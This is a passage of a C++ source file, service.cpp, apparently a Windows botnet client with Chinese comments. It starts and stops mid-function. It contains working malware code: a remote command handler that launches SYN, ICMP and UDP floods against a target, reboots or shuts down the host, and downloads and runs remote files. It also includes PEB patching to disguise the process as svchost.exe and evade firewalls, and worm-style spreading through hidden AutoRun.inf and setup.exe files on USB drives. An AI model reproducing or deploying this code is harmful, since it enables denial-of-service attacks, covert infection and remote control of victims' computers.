📄 service.cpp
字号:
::CreateThread(NULL,0,SynFlood,NULL,0,NULL);
::CreateThread(NULL,0,UDP_flood,NULL,0,NULL);
}
break;
case 97://重起
{
SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
ExitWindowsEx(EWX_REBOOT,0);
}
break;
case 98://关机
{
SetPrivilege(SE_SHUTDOWN_NAME,TRUE);
ExitWindowsEx(EWX_SHUTDOWN,0);
}
break;
case 99://卸载
{
StopMyService();
char SysDirBuff[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcat(SysDirBuff,"\\drivers\\svchost.exe");
MoveFileEx(SysDirBuff,"abc.bak",MOVEFILE_DELAY_UNTIL_REBOOT);
ExitProcess(0);
}
break;
case 100://stop thread
stopfuck=true;
break;
case 101://down & run
DownExec(fuckweb.FuckIP);
break;
case 102://open url
OpenUrl(fuckweb.FuckIP);
break;
default:
break;
}
}
break;
case FD_CLOSE:
//MessageBox(NULL,"FD_CLOSE",NULL,MB_OK);
closesocket(wParam);
break;
}
break;
case WM_DESTROY:
PostQuitMessage(0);
WSACleanup();
break;
case WM_DEVICECHANGE://
if(modify_data.IsUpan)
OnDeviceChange(hWnd,wParam,lParam);
break;
default:
return DefWindowProc(hWnd,message,wParam,lParam);
}
return 0;
}
//*********************************************************
/***********************************************/
//Get System Infomation
bool GetSystemInfo(SYSTEMINIT& sysinfo)
{
/////get computer name///////
memset(sysinfo.computer,0,sizeof(sysinfo.computer));
DWORD len=sizeof(sysinfo.computer);
if(!GetComputerName(sysinfo.computer,&len))
return false;
///////get system version//////////
sysinfo.os[0]=0;
OSVERSIONINFO osvi;
memset(&osvi,0,sizeof(osvi));
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(!GetVersionEx(&osvi))
return false;
switch (osvi.dwPlatformId)
{
case VER_PLATFORM_WIN32_NT:
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2 )
strcat(sysinfo.os,"Windows2003");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 )
strcat(sysinfo.os,"WindowsXP");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0 )
strcat(sysinfo.os,"Windows2000");
if ( osvi.dwMajorVersion <= 4 )
strcat(sysinfo.os,"WindowsNT");
break;
case VER_PLATFORM_WIN32_WINDOWS:
if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 0)
strcat(sysinfo.os,"Windows95");
if (osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 10)
strcat(sysinfo.os,"Windows98");
break;
}
////get memory size////////////////
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
memset(sysinfo.MemorySize,0,sizeof(sysinfo.MemorySize));
strcpy(sysinfo.MemorySize,itoa(mem.dwTotalPhys/1024/1024+2,sysinfo.MemorySize,10));
strcat(sysinfo.MemorySize,"MB");
///////server version//////////////////
memset(sysinfo.version,0,sizeof(sysinfo.version));
strcpy(sysinfo.version,"20070701");
///////connect pass///////////////////
sysinfo.Pass=atoi(modify_data.ConnectPass);
return true;
}
//------------将该进程伪装为svchost.exe----------
void ByPassFireWall()
{
char szpath[64];
static char modulepath[128];//一定是全局变量,why?
GetSystemDirectory(szpath,64);
strcat(szpath,"\\svchost.exe");
//转化为Unicode字符
for (int ii=0;ii<64;ii++)
{
modulepath[ii*2] = szpath[ii];
modulepath[ii*2+1] = 0;
}
//检测瑞星防火墙,防止蓝屏
bool NoRing=true;
HANDLE Snapshot;
Snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 processListStr;
processListStr.dwSize=sizeof(PROCESSENTRY32);
BOOL return_value;
return_value=Process32First(Snapshot,&processListStr);
int i=0;//item index
char ProcessName[32];
while(return_value)
{
strcpy(ProcessName,processListStr.szExeFile);
for(int t=0;t<strlen(ProcessName);t++)
{
ProcessName[t]=processListStr.szExeFile[t]|0x20;
}
if(strstr(ProcessName,"rfwsrv.exe")!=NULL)
{
NoRing=false;
break;
}
return_value=Process32Next(Snapshot,&processListStr);
//获得系统进程链表中下一个进程的信息
i++;
}
if (NoRing)
{
__asm
{
MOV EAX, fs:[30h]
MOV EAX, [EAX+0xC]
MOV EAX, [EAX+0xC]
lea ebx,modulepath
mov WORD ptr[EAX+0x24],0x60
mov [EAX+0x28],ebx
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10]
lea EAX,[EAX+0x3c]
lea ebx,modulepath
mov [eax],ebx //ImagePathName->Buffer
mov WORD ptr[eax-4],0x60 //ImagePathName->Length
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[EAX+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,modulepath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
}
else
{
__asm
{
MOV EAX, fs:[30h]
MOV EAX, [EAX+0xC]
MOV EAX, [EAX+0xC]
lea ebx,modulepath
mov WORD ptr[EAX+0x24],0x60
mov [EAX+0x28],ebx
MOV EAX, fs:[30h]
mov EAX,[EAX+0x10] //peb->_RTL_USER_PROCESS_PARAMETERS
lea eax,[EAX+0x44] //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
lea ebx,modulepath
mov [eax],ebx //CommandLine-->Buffer
mov WORD ptr[eax-4],0x60 //CommandLine-->Length
}
}
}
//--------------U盘传播----------------------------
BOOL CreateAutoRunFile(char*name,char *path)
{
FILE *out;
out=fopen(path,"w+");
if(out)
{
fprintf(out,"[AutoRun]\r\n");
fprintf(out,"open=%s\r\n",name);
fprintf(out,"shellexecute=%s\r\n",name);
fprintf(out,"shell\\Auto\\command=%s\r\n",name);
fclose(out);
return TRUE;
}
else
return FALSE;
}
BOOL SetFileAttrib(char *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
char FirstDriveFromMask(ULONG unitmask)
{
char i;
for (i = 0; i < 26; ++i)
{
if (unitmask & 0x1)//看该驱动器的状态是否发生了变化
break;
unitmask = unitmask >> 1;
}
return (i + 'A');
}
BOOL CopyToUAndSet(char *U)
{
char This_File[256];
memset(This_File,0,sizeof(This_File));
::GetSystemDirectory(This_File,sizeof(This_File));
strcat(This_File,"\\drivers\\svchost.exe");
char szPath[40];
sprintf(szPath,"%c:\\setup.exe",U[0]);//得到指向U盘的完整目录
char szAutoFile[40];
sprintf(szAutoFile,"%c:\\AutoRun.inf",U[0]);
if(CreateAutoRunFile("setup.exe",szAutoFile))
SetFileAttrib(szAutoFile);
CopyFile(This_File,szPath,FALSE);
return SetFileAttrib(szPath);
}
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
char U[4];
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: //插入
if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask);//得到u盘盘符
CopyToUAndSet(U);//拷到u盘
}
break;
case DBT_DEVICEREMOVECOMPLETE: //设备删除
break;
}
return LRESULT();
}
//---------------------------------------------------
/***********************************************/
//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer,int size)
{
unsigned long cksum=0;
while (size>1)
{
cksum+=*buffer++;
size-=sizeof(USHORT);
}
if (size)
{
cksum+=*(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}
/***********************************************/
unsigned long resolve(char *host)
{
long i;
struct hostent *he;
if((i=inet_addr(host))<0)
if((he=gethostbyname(host))==NULL)
return(0);
else
return(*(unsigned long *)he->h_addr);
return(i);
}
/*********************SYN FLOOD**************************/
unsigned long CALLBACK SynFlood(LPVOID dParam)
{
WSADATA WSAData;
WSAStartup(MAKEWORD(2,2) ,&WSAData);
SOCKET sendSocket;
SOCKADDR_IN Sin;
IP_HEADER ipHeader;
TCP_HEADER tcpHeader;
PSD_HEADER psdHeader;
char szSendBuf[1024] = "";
if((sendSocket = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
{
printf("Socket Setup Error...\n");
return 0;
}
BOOL flag=1;
if(setsockopt(sendSocket, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR)
{
printf("Setsockopt IP_HDRINCL Error...\n");
return 0;
}
int timeout = 3000;
if(setsockopt(sendSocket, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout, sizeof(timeout)) == SOCKET_ERROR)
{
printf("Setsockopt SO_SNDTIMEO Error...\n");
return 0;
}
Sin.sin_family = AF_INET;
Sin.sin_port=htons(fuckweb.FuckPort);
Sin.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);
char src_ip[20] = {0};
while(!stopfuck)
{
wsprintf( src_ip, "%d.%d.%d.%d", rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1, rand() % 250 + 1 );
//填充IP首部
ipHeader.h_verlen = (4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos = 0;
ipHeader.total_len = htons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident = 1;
ipHeader.frag_and_flags = 0x40;
ipHeader.ttl = 128;
ipHeader.proto = IPPROTO_TCP;
ipHeader.checksum = 0;
ipHeader.sourceIP = inet_addr(src_ip);
ipHeader.destIP = Sin.sin_addr.s_addr;
//填充TCP首部
tcpHeader.th_sport = htons(rand()%1025); //源端口号
tcpHeader.th_dport = htons( fuckweb.FuckPort );
tcpHeader.th_seq = htonl( rand()%900000000 + 1 );
tcpHeader.th_ack=rand()%3;
if (rand()%2 == 0) tcpHeader.th_flag=0x02;//SYN
else tcpHeader.th_flag=0x10;//ACK
tcpHeader.th_lenres = (sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_win = htons(512);
tcpHeader.th_sum = 0;
tcpHeader.th_urp = 0;
psdHeader.saddr = ipHeader.sourceIP;
psdHeader.daddr = ipHeader.destIP;
psdHeader.mbz = 0;
psdHeader.ptcl = IPPROTO_TCP;
psdHeader.tcpl = htons(sizeof(tcpHeader));
//计算TCP校验和
memcpy( szSendBuf, &psdHeader, sizeof(psdHeader) );
memcpy( szSendBuf + sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader) );
tcpHeader.th_sum = checksum( (USHORT *) szSendBuf, sizeof(psdHeader) + sizeof(tcpHeader) );
//计算IP检验和
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
memcpy( szSendBuf + sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
memset( szSendBuf + sizeof(ipHeader) + sizeof(tcpHeader), 0, 4 );
ipHeader.checksum = checksum( (USHORT *) szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader) );
memcpy( szSendBuf, &ipHeader, sizeof(ipHeader) );
memcpy( szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader) );
for(int a=0;a<100;a++)
{
sendto(sendSocket, szSendBuf, sizeof(ipHeader) + sizeof(tcpHeader), 0, (struct sockaddr*)&Sin, sizeof(Sin));
printf(".");
}
Sleep(40);
}
return 0;
}
/****************ICMP FLOOD*******************************/
void fill_icmp_data(char *icmp_data, int datasize)
{
ICMP_HEADER *icmp_hdr;
char *datapart;
icmp_hdr = (ICMP_HEADER*)icmp_data;
icmp_hdr->i_type = ICMP_ECHO;
icmp_hdr->i_code = 0;
icmp_hdr->i_id = (USHORT)GetCurrentProcessId();
icmp_hdr->i_cksum = 0;
icmp_hdr->i_seq = 0;
datapart = icmp_data + sizeof(ICMP_HEADER);
memcpy(datapart,icmpBuffer,strlen(icmpBuffer));
}
unsigned long CALLBACK icmp_flood(LPVOID dParam)
{
WSADATA wsaData;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SOCKET m_hSocket;
SOCKADDR_IN m_addrDest;
char *icmp_data;
int datasize = 32;
int timeout = 2000;
m_hSocket = WSASocket (AF_INET, SOCK_RAW, IPPROTO_ICMP, NULL, 0,WSA_FLAG_OVERLAPPED);
if (m_hSocket == INVALID_SOCKET)
return 0;
if (setsockopt(m_hSocket, SOL_SOCKET, SO_SNDTIMEO, (char*)&timeout, sizeof(timeout)) == SOCKET_ERROR)
return 0;
memset(&m_addrDest, 0, sizeof(m_addrDest));
m_addrDest.sin_family = AF_INET;
m_addrDest.sin_addr.S_un.S_addr=resolve(fuckweb.FuckIP);
datasize += sizeof(ICMP_HEADER);
icmp_data =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,MAX_PACKET);
memset(icmp_data,0,MAX_PACKET);
fill_icmp_data(icmp_data,MAX_PACKET);
int seq_no=0;
while(!stopfuck)
{
((ICMP_HEADER*)icmp_data)->i_cksum = 0;
((ICMP_HEADER*)icmp_data)->i_seq = seq_no++;
((ICMP_HEADER*)icmp_data)->timestamp = GetTickCount();
((ICMP_HEADER*)icmp_data)->i_cksum = checksum((USHORT*)icmp_data, MAX_PACKET);
sendto(m_hSocket, icmp_data, MAX_PACKET, 0, (struct sockaddr*)&m_addrDest, sizeof(m_addrDest));
if (seq_no>=65534)
seq_no=1;
Sleep(40);
}
return 0;
}
/************************UDP ATTACK***********************************/
unsigned long CALLBACK UDP_flood(LPVOID dParam)
{
WSADATA WSAData;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -